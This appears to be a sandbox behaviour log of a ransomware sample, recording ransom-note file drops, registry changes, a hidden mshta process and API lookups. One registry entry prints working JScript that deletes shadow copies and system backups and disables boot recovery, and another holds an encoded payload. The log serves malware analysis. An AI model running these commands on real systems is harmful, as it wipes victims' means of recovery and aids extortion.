Write	C:\588bce7c90097ed212\3082\eula.rtf	size = 178	1	Fn Data
Write	C:\588bce7c90097ed212\3082\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\3082\LocalizedData.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\3082\LocalizedData.xml	size = 1024	2	Fn Data
Write	C:\588bce7c90097ed212\3082\LocalizedData.xml	size = 24	1	Fn Data
Write	C:\588bce7c90097ed212\3082\LocalizedData.xml	size = 194	1	Fn Data
Write	C:\588bce7c90097ed212\Client\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Client\Parameterinfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Client\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\Client\UiInfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Extended\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Extended\Parameterinfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Extended\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\Extended\UiInfo.xml	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\я	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Print.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\HOW TO RECOVER ENCRYPTED FILES.TXT	size = 2175	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate1.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate2.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate3.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate4.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate5.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate6.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate7.ico	size = 1	1	Fn Data
Write	C:\588bce7c90097ed212\Graphics\Rotate8.ico	size = 1	1	Fn
Delete	C:\Users\FD1HVy\AppData\Roaming\osk.exe	-	1	Fn
Delete	C:\я	-	1	Fn
Delete	C:\588bce7c90097ed212\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1025\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1028\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1029\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1030\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1031\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1032\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1033\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1035\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1036\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1037\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1038\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1040\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1041\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1042\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1043\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1044\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1045\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1046\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1049\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1053\я	-	1	Fn
Delete	C:\588bce7c90097ed212\1055\я	-	1	Fn
Delete	C:\588bce7c90097ed212\2052\я	-	1	Fn
Delete	C:\588bce7c90097ed212\2070\я	-	1	Fn
Delete	C:\588bce7c90097ed212\3076\я	-	1	Fn
Delete	C:\588bce7c90097ed212\3082\я	-	1	Fn
Delete	C:\588bce7c90097ed212\Client\я	-	1	Fn
Delete	C:\588bce7c90097ed212\Extended\я	-	1	Fn
Delete	C:\588bce7c90097ed212\Graphics\я	-	1	Fn

Registry (12)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\CADHC	-	1	Fn
Create Key	HKEY_CURRENT_USER\Software\shwlwook	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\shwlwook	-	3	Fn
Open Key	HKEY_CURRENT_USER\Software	-	1	Fn
Write Value	HKEY_CURRENT_USER\Software\CADHC	value_name = SH[YU, data = o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);, size = 356, type = REG_SZ	1	Fn
Write Value	HKEY_CURRENT_USER\Software\shwlwook	value_name = temp, data = LQMAAAAAAACdzGBIK3qN2PikvwwDKqsN77f+BFRqAolPV2bGlsX8obo1SM8ffliIbeO6r+dVx=4B2G8gQGcb40FFUsZ9QSioFvAhw5RuST3Dj3cgySNj0kWRfMoyPcWm03tgc15HtHfrA1dbeb8x38CBrAhr21PyPDs+Zfxhd7rAmX8s1AN9o0kZjXusJDZAP1lec0X9zrGeyFIJZVmu9xIBKhtsHvIC3UAxax4J9OTfK+WuXSYM5xNtyBDL82jzrsHMxqUSw=eCQ2uR2dg1hXpYiPws=TCSsw8BFt18jq9Goiir8K83ck7oNh3npwopr0if0ElxsXHz7G5qJh+I+otLWHK2dL50TYq3O1JNlnEfM0UNvk0j7coHsdMPyl59YjkiyS96BuYlHdPwzG5vqtzXHSystkPBa7aDNBknJ5Eu=cuZKyl8ECnA+ECyq2GnrNNvnK3DIXrskavDXU=HTH=SfX1Jz40CatNS90gTzXMqGdRNYhXXnoKKB1KAVYmMcdpzzc+MgsWlRH05zdLr08uplDKAaDll74=vOyr3wbGJk3d4vS8Mgg8=SHFn=SkF1XFS5xibXwvWYOANBxG5pyzXa45Ueqmm0N=hvzwauVX8wVafHHWThCpF7yrg9+qXY53El+nWpswBLDvIOnrYSXhseoPkqV37qsBFG7HtUjm9V2z5zxYv07+plNtd14FSGBhHHHbgWAKfKIuRwx5fBHMjQopVc6I=vN4B17UUlPEk7BbXxTj+kH=k8PUNjPZpcbQCMOTiyo+b=19aDScEr74wlepk43D2q7THOKQfIpqOihYpnAlmaPh32te4MnN8N3ghBL7KG7hCtnzJUhhvzmr5N03TK3TPmDXo+SMiqrnxV+oz8SgIZU8EMCu+u75gTCqHDQVnWukopR4fqM8pm2H1NrtboTHL6lV2fXWlHjTZcxQHuVYg94DSi4IdXDbJa7MiOLdtQPV3ZXZ9B3nO3vBe+1OOEYuKFOO1=nHt1G2iY2+1nHrtbbdmOUozwsw6swGCRcanfhiuNer1aZfnDhVXlx=BQ0hP5x50ffmP70ODysuAdFQ5Q9Rsfkf4iS8vGuPFh=9dVI8, size = 1100, type = REG_SZ	1	Fn
Delete Key	HKEY_CURRENT_USER\Software\CADHC	-	1	Fn

Process (354)

Operation	Process	Additional Information	Count	Logfile
Create	mshta.exe	os_pid = 0xd00, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	mshta.exe	show_window = SW_HIDE	1	Fn
Enumerate Processes	-	-	349	Fn
Enumerate Processes	-	-	3	Fn

Module (788)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x74ea0000	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x74ea0000	1	Fn
Load	kernel32	base_address = 0x75e90000	1	Fn
Load	api-ms-win-core-string-l1-1-0	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-datetime-l1-1-1	base_address = 0x74ea0000	1	Fn
Load	api-ms-win-core-localization-obsolete-l1-2-0	base_address = 0x74ea0000	1	Fn
Load	oleaut32.dll	base_address = 0x75bb0000	2	Fn
Load	advapi32.dll	base_address = 0x761b0000	2	Fn
Load	user32.dll	base_address = 0x74b70000	2	Fn
Load	kernel32.dll	base_address = 0x75e90000	4	Fn
Load	wininet.dll	base_address = 0x70c00000	1	Fn
Load	shell32.dll	base_address = 0x76480000	3	Fn
Load	C:\Users\FD1HVy\AppData\Roaming\osk.ENU	base_address = 0x0	1	Fn
Load	C:\Users\FD1HVy\AppData\Roaming\osk.EN	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	3	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77bb0000	7	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x761b0000	2	Fn
Get Handle	c:\users\fd1hvy\appdata\roaming\osk.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x75bb0000	1	Fn
Get Filename	-	process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 261	2	Fn
Get Filename	c:\users\fd1hvy\appdata\roaming\osk.exe	process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 261	1	Fn
Get Filename	C:\Users\FD1HVy\AppData\Roaming\osk.EN	process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 522	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsAlloc, address_out = 0x74f9bea0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsSetValue, address_out = 0x74f92550	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = InitializeCriticalSectionEx, address_out = 0x74f97060	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = FlsGetValue, address_out = 0x74f870c0	2	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCMapStringEx, address_out = 0x74f7ed00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ea4280	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75ea4ae0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75ea4b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75ea4b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75ea4b40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75efebc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitOnceExecuteOnce, address_out = 0x74f95550	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75efeb20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75efeb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75efeb80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75ea6d30	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77bfd7c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77bfb740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75ea6d70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77bfc0b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77bfbe10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77c22b20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77c152f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75ea4510	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x74f9e260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75ea0db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleEx, address_out = 0x75ea43d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandle, address_out = 0x75eff110	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeConditionVariable, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeConditionVariable, address_out = 0x77c88c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeAllConditionVariable, address_out = 0x77c18a90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableCS, address_out = 0x7500fca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSRWLock, address_out = 0x77c13a00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x77bf58e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableSRW, address_out = 0x7500fcf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWork, address_out = 0x75ea6db0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SubmitThreadpoolWork, address_out = 0x77bfeb00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWork, address_out = 0x77bfed50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ea7050	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ea7190	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ea7480	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = CompareStringEx, address_out = 0x74f62c20	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = EnumSystemLocalesEx, address_out = 0x74f63a60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetDateFormatEx, address_out = 0x74fd9b40	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetLocaleInfoEx, address_out = 0x74f8f170	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetTimeFormatEx, address_out = 0x74fd9e10	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = GetUserDefaultLocaleName, address_out = 0x74f94220	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = IsValidLocaleName, address_out = 0x74f8ed60	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LCIDToLocaleName, address_out = 0x74f8da50	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = LocaleNameToLCID, address_out = 0x74f6bac0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = memcpy, address_out = 0x77c27b00	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysFreeString, address_out = 0x75bcb920	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysReAllocStringLen, address_out = 0x75bd1500	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SysAllocStringLen, address_out = 0x75bcb7e0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExA, address_out = 0x761cf020	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExA, address_out = 0x761cf210	2	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x761ced60	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetKeyboardType, address_out = 0x74be8d80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74ba3160	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadStringA, address_out = 0x74b8d7b0	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxA, address_out = 0x74bdd740	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextA, address_out = 0x74b8bf60	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75ea4ca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75ea6760	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75ea69d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75ea6970	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75efdd50	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75ea5da0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75ea8820	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualQuery, address_out = 0x75ea6a70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75ea6b10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75ea5c40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75ea6c50	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x75ea6c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExA, address_out = 0x75ea5aa0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetThreadLocale, address_out = 0x75ea5600	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoA, address_out = 0x75ee28e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75ea51b0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75ea50b0	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x75ea5070	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoA, address_out = 0x75ea5020	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75ea4cb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75ea4c40	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileA, address_out = 0x75efedb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75efed70	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75ea3cb0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75ea46b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75eff180	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75ea68d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75ea7c10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75ea5e20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75ea5330	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75ea6870	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75ea6850	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75ea5b20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74b9f900	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SystemParametersInfoW, address_out = 0x74b9f210	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageA, address_out = 0x74b887a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x74b9ddc0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetLastInputInfo, address_out = 0x74b8bd10	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageA, address_out = 0x74b8fd80	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharNextW, address_out = 0x74ba1130	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffW, address_out = 0x74b934a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharLowerBuffA, address_out = 0x74be75b0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharUpperBuffA, address_out = 0x74be7650	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CharToOemA, address_out = 0x74bdf020	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WinExec, address_out = 0x75ee2b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75efeca0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ea67e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SizeofResource, address_out = 0x75ea6740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75eff140	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75eff120	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75eff100	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75eff0e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75eff090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75ea5cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexA, address_out = 0x75ede030	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75ede500	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LockResource, address_out = 0x75ea5bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadResource, address_out = 0x75ea5b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75ea5a80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77bfb250	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77c0af20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalUnlock, address_out = 0x75ee44e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalReAlloc, address_out = 0x75ee3f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalHandle, address_out = 0x75ee4420	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalLock, address_out = 0x75ee42f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75ea1ee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x75ea5750	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75ea56d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75ea5090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocalTime, address_out = 0x75ea5060	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75ea5010	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesA, address_out = 0x75efeee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x75ea4f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceA, address_out = 0x75efee80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatA, address_out = 0x75ea76e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75ea4cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75ea4d10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeResource, address_out = 0x75ea4c80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageA, address_out = 0x75ea4bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindResourceA, address_out = 0x75ee27c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75efee40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75efedf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x75efed60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x75ee1eb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumCalendarInfoA, address_out = 0x75ebc0d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77bfb2d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75efed40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77bdfb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75ea4610	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75ea45b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreatePipe, address_out = 0x75ea4590	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75efeb40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75efed10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringA, address_out = 0x75ea4410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75efeab0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExA, address_out = 0x761cffc0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumValueA, address_out = 0x761d1940	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyExA, address_out = 0x761d1960	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueA, address_out = 0x761d07a0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteKeyA, address_out = 0x761cf8c0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExA, address_out = 0x761cf560	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x70d33a70	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x70dfe8c0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x70d1f1a0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x70d0d000	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x765e42e0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x765e3790	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x7658bda0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetMalloc, address_out = 0x765edf80	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayPtrOfIndex, address_out = 0x75bd6670	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetUBound, address_out = 0x75bd5460	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetLBound, address_out = 0x75bd5ea0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreate, address_out = 0x75bd0340	1	Fn
